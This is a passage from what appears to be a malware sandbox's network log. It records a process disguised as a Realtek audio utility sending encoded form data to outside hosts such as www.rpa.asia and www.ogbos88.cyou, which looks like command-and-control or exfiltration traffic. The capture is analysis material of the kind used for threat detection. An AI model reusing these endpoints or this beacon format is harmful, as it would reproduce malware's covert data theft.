min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:31:44.145184040 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49736	160.25.166.123	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:46.658318996 CET	1289	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 6a 5a 7a 43 6b 65 6b 75 6e 38 44 77 2f 37 48 34 35 47 49 55 50 47 6f 6b 4f 2b 79 58 71 46 68 73 48 48 4f 6c 67 34 56 61 74 45 69 49 45 5a 30 72 74 6a 4f 43 43 76 76 6a 78 4c 63 52 34 77 6e 43 42 75 4c 4d 38 64 56 69 41 4b 63 4a 33 49 72 71 72 78 36 39 46 54 2b 45 78 65 59 34 39 6e 34 30 33 69 45 32 62 38 75 65 70 78 4c 36 4c 59 66 42 59 76 69 63 71 52 70 69 31 56 56 7a 34 50 48 6a 45 72 30 69 68 32 64 37 2b 32 43 59 6c 6c 6f 32 6b 78 46 5a 45 39 5a 6c 65 77 51 5a 32 46 55 72 64 42 45 43 7a 6a 55 51 70 72 49 2b 32 6c 75 38 34 45 62 34 59 33 41 6d 63 53 2b 31 76 68 38 36 59 42 37 [TRUNCATED] Data Ascii: cOnShP=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH
Jan 9, 2025 08:31:46.658371925 CET	3867	OUT	Data Raw: 35 65 79 53 4e 65 2b 6c 71 78 6e 5a 64 70 44 72 32 6a 58 53 4b 70 63 44 55 56 36 6a 77 73 54 6b 65 50 68 76 5a 61 54 38 34 54 2b 4d 76 61 4f 33 77 61 48 59 52 43 54 46 59 66 79 4d 45 38 36 6c 67 59 6c 74 34 64 4a 35 38 45 66 77 64 4d 38 58 42 75 Data Ascii: 5eySNe+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb
Jan 9, 2025 08:31:46.658448935 CET	2800	OUT	Data Raw: 6f 71 76 51 43 33 6d 62 4f 36 45 45 4c 74 38 2b 58 41 55 49 75 7a 67 77 6b 2f 67 30 37 42 30 77 45 76 6a 67 7a 65 51 4a 36 4a 4a 70 71 49 6d 43 56 58 71 62 36 49 38 50 4a 44 68 63 53 37 50 72 50 42 38 43 48 61 65 4b 77 6b 76 47 77 2b 6e 58 53 4e Data Ascii: oqvQC3mbO6EELt8+XAUIuzgwk/g07B0wEvjgzeQJ6JJpqImCVXqb6I8PJDhcS7PrPB8CHaeKwkvGw+nXSNpVkxFJ5zMPn9gmYhABnVaQF7yqCtMW5+CBbwTNnpeA8K3hzr1KVWAiQXr3BACdKSZPJcJR03YW3A+oizC01gSCqD5KeMTBi0tNGcvMxcRdaAslvh1mcnM8Is+Sf8mr9skx3JIQreGZjD1as14W53kpnu1yeFWtewO
Jan 9, 2025 08:31:47.003294945 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:31:46 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:31:47.003303051 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49737	160.25.166.123	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:49.541184902 CET	536	OUT	GET /bwjl/?cOnShP=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:31:49.893764973 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:31:49 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:31:49.893774986 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	49738	172.67.132.227	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:55.175820112 CET	799	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 41 73 77 73 49 6d 57 6d 35 43 47 6a 71 51 42 6a 78 4a 4e 76 51 3d 3d Data Ascii: cOnShP=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
Jan 9, 2025 08:31:55.304272890 CET	810	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:31:55 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:31:55 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=usqs0IK3avjNSrPamIIy9w3%2FHCWmI2QmLCmHEXpdV8DSudZ0IL0yybb%2FFEzSmrSon3unvacWrqFfpyKE1YbdwiI4hxGQORo8tx5Pw%2BpI6pTGyt%2Bd4q%2Bx1XTyH7sJSTsddz%2FC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ff2bafe3c9810a5-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49739	172.67.132.227	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:57.822129011 CET	819	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 47 47 31 7a 6b 62 76 4b 2f 4e 57 78 72 78 4c 64 46 64 37 6b 3d Data Ascii: cOnShP=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
Jan 9, 2025 08:31:57.950416088 CET	804	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:31:57 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:31:57 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bz%2Bd2O52JIRzTwSIvUy0Cj82UGHY3q%2FcFIAOowWe3%2FskR6SEpWOxruxmkjyPNkOwIS6FFwbwYwgrNEZJGgJphFeuwGshnwouKopyRSK6MouZoFp95QGA2a9OfefndZQj7Jea"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ff2bb0ecc89615e-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49740	172.67.132.227	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:00.462574005 CET	2578	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 31 79 48 73 32 4c 34 6e 33 48 53 38 52 37 48 35 5a 58 42 53 55 36 45 55 4a 41 6e 75 59 57 54 78 79 58 77 63 42 38 72 67 70 75 54 39 49 47 38 71 6f 31 53 6d 6c 59 33 73 51 72 4d 58 54 72 34 45 6f 43 35 4f 6e 6c 62 6b 70 68 53 66 38 33 7a 45 67 51 72 39 41 42 32 73 51 6c 36 79 5a 63 6d 35 35 44 53 68 79 6e 4d 37 32 32 37 79 6d 55 75 74 59 76 61 62 76 74 68 47 36 54 42 59 42 4c 45 31 39 6f 61 44 76 72 58 63 63 44 37 44 32 47 51 4a 50 44 76 36 49 49 35 78 38 64 64 46 6c 39 56 4f 46 41 4e 33 72 64 43 69 4c 56 6e 4e 72 47 68 35 35 73 4c 43 38 75 33 6a 43 68 39 51 4c 67 55 66 4a 65 [TRUNCATED] Data Ascii: cOnShP=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj51yHs2L4n3HS8R7H5ZXBSU6EUJAnuYWTxyXwcB8rgpuT9IG8qo1SmlY3sQrMXTr4EoC5OnlbkphSf83zEgQr9AB2sQl6yZcm55DShynM7227ymUutYvabvthG6TBYBLE19oaDvrXccD7D2GQJPDv6II5x8ddFl9VOFAN3rdCiLVnNrGh55sLC8u3jCh9QLgUfJeKx3lAirVxgQND0gbkRaAAniDbLJz2k7dSWE5yFZEUaOADkKuEIjwTQly/qfGuNnBAyxr04WNyp1odqbRNei/IjZA3bIiEiAr/kHcoGoEtJpqcg6UntDbo6jocQX84qspY1ZJ0p8FcIRT1vNJDVE4yIkImROWLh0Ow8jDdLv2C/L4AFTnDMvjuFGjKA2tHWwhU1caOR82yMGGsacYREDshpiXMixHChlwV1bOcao17swzRzb7K2AoMCULnl9MNGICEJje5+RXGg8i6QV110SIWi61SuI8K4BfjCwXJlsUkE3ARHZysswkg3cquqA9PBCyWdUxfhjhykrYqasrWAXAv2pSybc06Z6XLDsTI6ztFY+Mq8Gq/P3zQTBxTjHqLgr+G/tqGjJs2Kc7JrmzC2kKlxONDbzDv0jLGRXzwUGQSU4IAppAhzUrfdkk4P7w+cqPAu9ofscbQAo+YMfJ2UZeTrNMkVfN59CyZ9uKqp+0xMxVTl2wvSY0d3UfpdsCxJZGCijmJ5PNTOUFnSkZGhfXNiijFWGpedP+MCYqykrbTwfmU1p9NEOkfFHLDtt52WWK+eJVGtzuB2gtVX3hYc052dYU/mT21ctshvXmBytH/BN/5axChIYIW/8t1UhymWbJnqh8yTQyzLJtDYraNeNh8aJnWr6Fhq603Z [TRUNCATED]
Jan 9, 2025 08:32:00.462644100 CET	5390	OUT	Data Raw: 4a 34 78 67 34 4d 30 42 7a 4d 6c 4f 71 2b 46 2f 69 75 44 69 49 47 61 50 4a 57 52 46 31 70 64 49 54 58 41 49 7a 64 6e 78 74 2f 72 44 73 6d 51 33 72 66 6b 65 63 41 41 43 35 79 67 59 79 41 31 47 73 46 55 35 6c 63 67 32 38 54 63 41 54 64 4b 6e 71 45 Data Ascii: J4xg4M0BzMlOq+F/iuDiIGaPJWRF1pdITXAIzdnxt/rDsmQ3rfkecAAC5ygYyA1GsFU5lcg28TcATdKnqE1DB8yJKSVpVBLHJ7i9xmFrnlJoGN0tBkMBhetLYM6HwPyXY14vg65Laudks85YxhIu8aVsjdzm1D8a3DRAHCHmP2miBFXgghyV6sNiJFh5hzgChmLiqSEmUxEJrOAfcZvjP3P8XT2DZU9w9R7RQ+KNHnimju9Johy
Jan 9, 2025 08:32:00.588349104 CET	806	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:32:00 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:32:00 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9lfkYVLQFyaCP8m2zUpwfAt0nw2Ret%2Bw4SQj5BCBDjpkF2KdgNhFwfWY5ub3ve21nak%2BCUFEeThY9M4CH%2BV7kFCJj2o8rjtThkj5PVmqBdaju%2BwJCvOXpWuF7w7WZCa1cKKJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8ff2bb1f4d5bf85d-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49741	172.67.132.227	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

